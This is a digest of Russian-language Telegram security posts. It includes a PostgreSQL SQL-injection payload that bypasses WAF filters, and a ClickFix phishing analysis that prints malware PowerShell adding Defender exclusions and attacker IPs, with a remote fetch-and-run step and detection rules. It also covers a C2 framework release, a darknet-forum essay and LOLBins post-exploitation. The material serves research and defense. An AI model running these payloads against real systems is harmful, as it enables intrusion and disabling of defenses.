Forwarded from Заметки Слонсера (Slonser)
Осознал что не все подписаны на меня в соц сети Илона Маска, поэтому возможно буду дублировать сюда некоторые посты
На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным.
Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request.
Придумал обход используя dollar-quoting синтаксис PostgreSQL:
Как PostgreSQL это парсит:
1. $$0$$ - dollar-quoted строка, автоматически каститься в integer
2. OR - логический оператор
3. -0-$$0$$ - арифметическое выражение
4. NOTNULL - проверка на null (вернет true)
Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +).
Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.
На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным.
Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request.
Придумал обход используя dollar-quoting синтаксис PostgreSQL:
$$0$$OR-0-$$0$$NOTNULL
Как PostgreSQL это парсит:
1. $$0$$ - dollar-quoted строка, автоматически каститься в integer
2. OR - логический оператор
3. -0-$$0$$ - арифметическое выражение
4. NOTNULL - проверка на null (вернет true)
Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +).
Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.
www.opennet.ru
Опубликован дистрибутив для анонимных коммуникаций Whonix 18.0
Доступен выпуск дистрибутива Whonix 18.0, нацеленного на предоставление гарантированной анонимности, безопасности и защиты частной информации. Дистрибутив основан на Debian GNU/Linux и использует Tor для обеспечения анонимности. Наработки проекта распространяются…
🔗Ссылка:
https://opennet.ru/64334/
https://opennet.ru/64334/
Forwarded from Detection is easy
Всем привет! 💻 ✌️
Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании
👨💻 Посмотрим TTP:
🔤 Атака начинается с
🔤 Приложение
🔤 Теперь самое интересное. Скачанный
🔤 Для повышения привилегий атакующие запускают
И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии
🔤 Последним этапом идёт установка RAT или стилера
🔭 Обнаружение:
🔤 отслеживаем аргументы powershell
🔤 отслеживаем создание новых значений в ключах реестра
🔤 отслеживаем события
#detection@detectioneasy
#ttp@detectioneasy
Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании
ClickFix (имитируется обновление системы: синий экран с процентами - всё привычно), в результате чего запускается удалённый скрипт через mshta.exehta запускает powershell.exe с командлетами iex (irm https://example.com/asf)ps1 начинает свою работу с повышения привилегий (UAC) и добавления исключений в Windows Defender
$uQVLE622ThHArk = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
$uQVLE622ThHArk +=
"; Add-MpPreference -ExclusionPath '$env:WINDIR"
$uQVLE622ThHArk +=
; Add-MpPreference -ExclusionPath '$env: TEMP"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env: USERPROFILE"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env:APPDATA"
$uQVLE622ThHArk += ";
Add-MpPreference -ExclusionPath '$env: LOCALAPPDATA"
$uQVLE622ThHArk += "; Add-MpPreference -ExclusionIpAddress '178.16.55.189', '94.154.35. 25'
powershell.exe с аргументом -Verb RunAs
$aXNXjSqHUpLoYk = Start-Process powershell.exe
-ArgumentList "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass - Command
`$ErrorActionPreference='Stop'; $uQVLE622ThHArk" `
-Verb RunAs `
-PassThru
И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии
Add-MpPreference, Set-MpPreference, -Exclusion*HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\ProviderName = "Microsoft-Windows-Windows Defender/Operational" AND EventId=5007 AND NewValue contains "Microsoft\Windows Defender\Exclusions"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Acronis
Fake adult websites pop realistic Windows Update screen to deliver stealers via ClickFix
Acronis TRU researchers have discovered an ongoing campaign that leverages a novel combination of screen hijacking techniques with ClickFix, displaying a realistic, full-screen Windows Update of “Critical Windows Security Updates” to trick victims into executing…
Forwarded from CYBERDEN | Хакинг и Кибербезопасность
Полезный Online x86/x64 Assembler. Особенно полезный для быстрой проверки опкодов на наличие "плохих" символов (при разработке шеллкода):
https://defuse.ca/online-x86-assembler.htm
https://defuse.ca/online-x86-assembler.htm
Forwarded from Whitehat Lab
Вышел релиз лучшего open-source C2
Обзоры
UPD 0.11:
Изменения
Переход на Go 1.25.x
Добавлены крутые BOF'ы
Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal
sudo apt install mingw-w64 make gcc g++ g++-mingw-w64
wget https://go.dev/dl/go1.25.4.linux-amd64.tar.gz -O /tmp/go1.25.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.25.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go
# for windows 7 support by gopher agent
git clone https://github.com/Adaptix-Framework/go-win7 /tmp/go-win7
sudo mv /tmp/go-win7 /usr/lib/
sudo apt install gcc g++ build-essential make cmake mingw-w64 g++-mingw-w64 libssl-dev qt6-base-dev qt6-base-private-dev libxkbcommon-dev qt6-websockets-dev qt6-declarative-dev
make server-ext
make client
#adaptixc2 #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
Triage Collector 🦖
A ready-to-run Velociraptor package that collects the evidence responders need without extra setup.
triage.zip provides an out-of-the-box Velociraptor triage collector for Windows, pre-configured for rapid and effective incident response. The project is intended for responders who need a reliable offline collector without the hassle of building from scratch.
🔗 https://triage.zip/
🦔 THF
A ready-to-run Velociraptor package that collects the evidence responders need without extra setup.
triage.zip provides an out-of-the-box Velociraptor triage collector for Windows, pre-configured for rapid and effective incident response. The project is intended for responders who need a reliable offline collector without the hassle of building from scratch.
🔗 https://triage.zip/
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedBlue Notes
Как люди попадают на хак-форумы даркнета?
Порог любопытства😑
Попасть на хакерский форум в даркнете — это никогда не история про случайный клик. Снаружи кажется, будто где-то существует скрытая сеть «закрытых клубов», куда участников приглашают через таинственные каналы. Но в реальности всё куда сложнее, хаотичнее и интереснее. Даже спустя столько лет в информационной безопасности один же парадокс: в мир подполья никто не «зовёт», туда втягивает собственное любопытство.
Первый контакт🤹
Чаще всего путь начинается с поверхностного поиска — вовсе не в даркнете, а в обычном интернете. Кто-то пытается обойти блокировку игры, кто-то ищет крякнутую программу, кто-то читает мутный Telegram-канал. Алгоритмы подсовывают смежные темы, запросы становятся глубже, и вот уже появляются первые намёки на Tor, инструкции по настройке и фразы «настоящая информация — не здесь». Большинство проходит мимо, но у тех, кто задерживается, возникает чувство порога: сделай шаг — и назад пути почти нет.
Разрушение мифов😼
Когда человек всё же устанавливает TOR и открывает первые onion-сайты, его накрывает разочарование. Вместо легенд — реальные медленные страницы, десятки фишинговых зеркал, хаос и мусор. Даркнет не похож на киберпанковский рынок знаний; это скорее заброшенный склад, где в куче хлама нужно уметь найти настоящие вещи. И именно здесь начинает работать второй механизм: выживают только те, кто умеет отличать реальное подполье от шлака.
Доверие как валюта🤝
Настоящий вход в сообщество происходит не через ссылку, а через взаимодействие. Один случайный никнейм, один полезный комментарий в открытой площадке — и уже есть повод кому-то написать. Приглашения выглядят не как церемония: просто «если хочешь больше — свяжись», или адрес, который даст только проверенный человек. Иногда — маленькое задание, чтобы отсеять журналистов и сотрудников ведомств. Здесь репутация весит больше, чем логин и пароль.
Как рождаются подпольные площадки☝️
Форумы появляются не потому, что кто-то решил «открыть новый проект». Их создают бывшие участники закрытых или снесённых площадок. Когда одну крупную точку притяжения накрывает расследование или внутренний конфликт, сообщество расползается, а через пару месяцев на его обломках вырастает новая, ещё более закрытая и параноидальная. Комьюнити само воспроизводит себе дом — и каждый раз делает его крепче.
Незаметный переход🪒
Самое любопытное — никто не чувствует момента «вступления». Нет двери, нет посвящения, нет фейерверка. Есть постепенное погружение: шаг за шагом, когда каждый следующий кажется логичным продолжением предыдущего. И именно потому большинству лучше никогда не переходить этот порог: путь выглядит безобидным в начале, но редко бывает безопасен в итоге.
Те, кто задержался там надолго, знают это слишком хорошо.
Такие дела🧛
Одним из известных подобных ресурсов был (и отчасти остаётся) форум Dread — часто его описывают как «Reddit для даркнета». На Dread обсуждают темы, связанные с рынками в даркнете, сливами данных, безопасностью, иногда — сомнительными услугами. Dread иллюстрирует, как работает «социальный лифт» в даркнете: сначала — любопытство, потом — осторожный интерес, затем — возможность общения, где репутация, а не паспорт, становится основой доверия.
Подписывайтесь на канал, дальше больше!
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону
Порог любопытства
Попасть на хакерский форум в даркнете — это никогда не история про случайный клик. Снаружи кажется, будто где-то существует скрытая сеть «закрытых клубов», куда участников приглашают через таинственные каналы. Но в реальности всё куда сложнее, хаотичнее и интереснее. Даже спустя столько лет в информационной безопасности один же парадокс: в мир подполья никто не «зовёт», туда втягивает собственное любопытство.
Первый контакт
Чаще всего путь начинается с поверхностного поиска — вовсе не в даркнете, а в обычном интернете. Кто-то пытается обойти блокировку игры, кто-то ищет крякнутую программу, кто-то читает мутный Telegram-канал. Алгоритмы подсовывают смежные темы, запросы становятся глубже, и вот уже появляются первые намёки на Tor, инструкции по настройке и фразы «настоящая информация — не здесь». Большинство проходит мимо, но у тех, кто задерживается, возникает чувство порога: сделай шаг — и назад пути почти нет.
Разрушение мифов
Когда человек всё же устанавливает TOR и открывает первые onion-сайты, его накрывает разочарование. Вместо легенд — реальные медленные страницы, десятки фишинговых зеркал, хаос и мусор. Даркнет не похож на киберпанковский рынок знаний; это скорее заброшенный склад, где в куче хлама нужно уметь найти настоящие вещи. И именно здесь начинает работать второй механизм: выживают только те, кто умеет отличать реальное подполье от шлака.
Доверие как валюта
Настоящий вход в сообщество происходит не через ссылку, а через взаимодействие. Один случайный никнейм, один полезный комментарий в открытой площадке — и уже есть повод кому-то написать. Приглашения выглядят не как церемония: просто «если хочешь больше — свяжись», или адрес, который даст только проверенный человек. Иногда — маленькое задание, чтобы отсеять журналистов и сотрудников ведомств. Здесь репутация весит больше, чем логин и пароль.
Как рождаются подпольные площадки
Форумы появляются не потому, что кто-то решил «открыть новый проект». Их создают бывшие участники закрытых или снесённых площадок. Когда одну крупную точку притяжения накрывает расследование или внутренний конфликт, сообщество расползается, а через пару месяцев на его обломках вырастает новая, ещё более закрытая и параноидальная. Комьюнити само воспроизводит себе дом — и каждый раз делает его крепче.
Незаметный переход
Самое любопытное — никто не чувствует момента «вступления». Нет двери, нет посвящения, нет фейерверка. Есть постепенное погружение: шаг за шагом, когда каждый следующий кажется логичным продолжением предыдущего. И именно потому большинству лучше никогда не переходить этот порог: путь выглядит безобидным в начале, но редко бывает безопасен в итоге.
Те, кто задержался там надолго, знают это слишком хорошо.
Такие дела
Одним из известных подобных ресурсов был (и отчасти остаётся) форум Dread — часто его описывают как «Reddit для даркнета». На Dread обсуждают темы, связанные с рынками в даркнете, сливами данных, безопасностью, иногда — сомнительными услугами. Dread иллюстрирует, как работает «социальный лифт» в даркнете: сначала — любопытство, потом — осторожный интерес, затем — возможность общения, где репутация, а не паспорт, становится основой доверия.
Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👎1
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👍2
Forwarded from Whitehat Lab
xbz0n.sh
Living Off the Land: Windows Post-Exploitation Without Tools
I'll never forget one of my first red team engagements where I learned this lesson the hard way. I'd spent two days carefully phishing my way into a financia...
Пост эксплуатация Windows без использования сторонних инструментов, в основном там
Understanding Living Off the Land
The term comes from the military concept of living off the land during operations - using local resources instead of bringing your own supplies. In cybersecurity, it refers to using built-in system tools and legitimate executables for malicious purposes. These binaries are often called LOLBins (Living Off the Land Binaries) or LOLBAs (Living Off the Land Binaries and Scripts
#redteam #windows #lolbins #powershell #wmi
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Whitehat Lab
Инструмент для анализа и проектирования сетевой инфраструктуры. Будет полезен пентестерам, сетевым инженерам, системным администраторам.
UPD
Возможности:
Работа с веб-интерфейсом
Табличное представление данных
Экспорт данных
Скриншот веб-ресурса
Поиск ПО по узлам сети
Сканирование с использованием nmap, masscan и scapy
Парсинг pcap-файлов
Интеграция с search-vulns
Формирование отчёта по найденным уязвимостям
Поиск по SNMP
Построение карты сети
Поиск субдоменов через DNS
HTTP REST API
Установка и запуск:
sudo apt install ./setezor_<ver>.deb
# Переменные окружения
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef
# Сервер
setezor
# Агент
setezor -s -p <port>
#setezor #network
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1